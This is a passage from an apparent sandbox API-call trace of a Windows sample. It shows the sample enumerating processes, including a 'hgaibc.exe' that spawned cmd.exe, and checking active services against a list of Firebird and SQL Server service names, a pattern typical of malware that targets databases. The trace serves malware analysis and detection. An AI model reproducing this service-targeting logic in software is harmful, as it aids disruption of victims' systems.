[0184.049] lstrlenW (lpString="svchost.exe") returned 11 [0184.049] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.050] lstrlenW (lpString="svchost.exe") returned 11 [0184.050] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.051] lstrlenW (lpString="svchost.exe") returned 11 [0184.051] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.051] lstrlenW (lpString="svchost.exe") returned 11 [0184.051] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.052] lstrlenW (lpString="svchost.exe") returned 11 [0184.052] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.053] lstrlenW (lpString="svchost.exe") returned 11 [0184.053] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.054] lstrlenW (lpString="svchost.exe") returned 11 [0184.054] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.055] lstrlenW (lpString="svchost.exe") returned 11 [0184.055] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.056] lstrlenW (lpString="svchost.exe") returned 11 [0184.056] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0184.057] lstrlenW (lpString="spoolsv.exe") returned 11 [0184.057] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.057] lstrlenW (lpString="svchost.exe") returned 11 [0184.057] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0184.058] lstrlenW (lpString="audiodg.exe") returned 11 [0184.058] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0184.059] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0184.059] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0184.060] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0184.060] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0184.061] lstrlenW (lpString="Memory Compression") returned 18 [0184.061] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0184.062] lstrlenW (lpString="sihost.exe") returned 10 [0184.062] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.063] lstrlenW (lpString="svchost.exe") returned 11 [0184.063] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0184.064] lstrlenW (lpString="msoia.exe") returned 9 [0184.064] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0184.064] lstrlenW (lpString="taskhostw.exe") returned 13 [0184.065] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.065] lstrlenW (lpString="explorer.exe") returned 12 [0184.065] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0184.066] lstrlenW (lpString="SearchUI.exe") returned 12 [0184.066] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0184.067] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0184.067] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0184.068] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0184.068] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.069] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0184.069] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0184.070] lstrlenW (lpString="dllhost.exe") returned 11 [0184.070] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0184.070] lstrlenW (lpString="hgaibc.exe") returned 10 [0184.070] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0184.071] lstrlenW (lpString="cmd.exe") returned 7 [0184.071] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0184.072] lstrlenW (lpString="conhost.exe") returned 11 [0184.072] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0184.073] lstrlenW (lpString="cmd.exe") returned 7 [0184.073] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xbb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0184.074] lstrlenW (lpString="conhost.exe") returned 11 [0184.074] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xbb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0184.074] CloseHandle (hObject=0x3a4) returned 1 [0184.075] Sleep (dwMilliseconds=0x1f4) [0184.818] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bed90 [0184.819] EnumServicesStatusExW (in: hSCManager=0x6bed90, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0184.819] GetLastError () returned 0xea [0184.819] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x772a00 [0184.820] EnumServicesStatusExW (in: hSCManager=0x6bed90, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x772a00, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x772a00, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0184.820] CloseServiceHandle (hSCObject=0x6bed90) returned 1 [0184.821] lstrlenW (lpString="Appinfo") returned 7 [0184.821] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0184.821] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0184.821] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0184.821] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0184.821] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0184.821] lstrlenW (lpString="AppXSvc") returned 7 [0184.821] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0184.821] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0184.821] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0184.821] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0184.821] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0184.821] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0184.821] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0184.821] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0184.821] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0184.821] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0184.821] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0184.821] lstrlenW (lpString="Audiosrv") returned 8 [0184.821] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0184.821] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0184.821] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0184.821] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0184.821] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0184.821] lstrlenW (lpString="BFE") returned 3 [0184.821] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0184.821] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0184.822] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0184.822] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0184.822] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0184.822] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0184.822] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0184.822] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0184.822] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0184.822] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0184.822] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0184.822] lstrlenW (lpString="CDPSvc") returned 6 [0184.822] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0184.822] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0184.822] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0184.822] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0184.822] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0184.822] lstrlenW (lpString="ClickToRunSvc") returned 13 [0184.822] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0184.822] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0184.822] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0184.822] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0184.822] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0184.822] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0184.822] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0184.822] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0184.822] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0184.822] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0184.822] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0184.822] lstrlenW (lpString="CryptSvc") returned 8 [0184.823] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0184.823] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0184.823] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0184.823] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0184.823] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0184.823] lstrlenW (lpString="DcomLaunch") returned 10 [0184.823] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0184.823] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0184.823] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0184.823] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0184.823] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0184.823] lstrlenW (lpString="DeviceAssociationService") returned 24 [0184.823] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0184.823] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0184.823] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0184.823] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0184.823] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0184.823] lstrlenW (lpString="Dhcp") returned 4 [0184.823] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0184.823] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0184.823] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0184.823] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0184.823] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0184.823] lstrlenW (lpString="Dnscache") returned 8 [0184.823] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0184.823] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0184.823] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0184.823] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0184.823] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0184.824] lstrlenW (lpString="DPS") returned 3 [0184.824] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0184.824] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0184.824] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0184.824] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0184.824] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0184.824] lstrlenW (lpString="DusmSvc") returned 7 [0184.824] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0184.824] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0184.824] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0184.824] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0184.824] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0184.824] lstrlenW (lpString="EventLog") returned 8 [0184.824] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0184.824] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0184.824] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0184.824] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0184.824] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0184.824] lstrlenW (lpString="EventSystem") returned 11 [0184.824] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0184.824] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0184.824] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0184.824] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0184.824] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0184.824] lstrlenW (lpString="FontCache") returned 9 [0184.824] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0184.824] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0184.824] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0184.824] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0184.824] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0184.824] lstrlenW (lpString="gpsvc") returned 5 [0184.824] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0184.824] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0184.824] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0184.825] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0184.825] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0184.825] lstrlenW (lpString="iphlpsvc") returned 8 [0184.825] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0184.825] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0184.825] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0184.825] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0184.825] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0184.825] lstrlenW (lpString="KeyIso") returned 6 [0184.825] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0184.825] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0184.825] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0184.825] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0184.825] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0184.825] lstrlenW (lpString="LanmanServer") returned 12 [0184.825] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0184.825] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0184.825] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0184.825] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0184.825] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0184.825] lstrlenW (lpString="LanmanWorkstation") returned 17 [0184.825] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0184.825] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0184.825] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0184.825] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0184.825] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0184.825] lstrlenW (lpString="lfsvc") returned 5 [0184.825] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0184.825] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0184.825] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0184.825] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0184.825] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0184.825] lstrlenW (lpString="lmhosts") returned 7 [0184.825] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0184.825] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0184.825] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0184.825] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0184.825] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0184.826] lstrlenW (lpString="LSM") returned 3 [0184.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0184.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0184.826] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0184.826] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0184.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0184.826] lstrlenW (lpString="MpsSvc") returned 6 [0184.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0184.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0184.826] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0184.826] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0184.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0184.826] lstrlenW (lpString="NcbService") returned 10 [0184.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0184.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0185.176] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0185.176] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0185.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0185.176] lstrlenW (lpString="netprofm") returned 8 [0185.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0185.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0185.176] 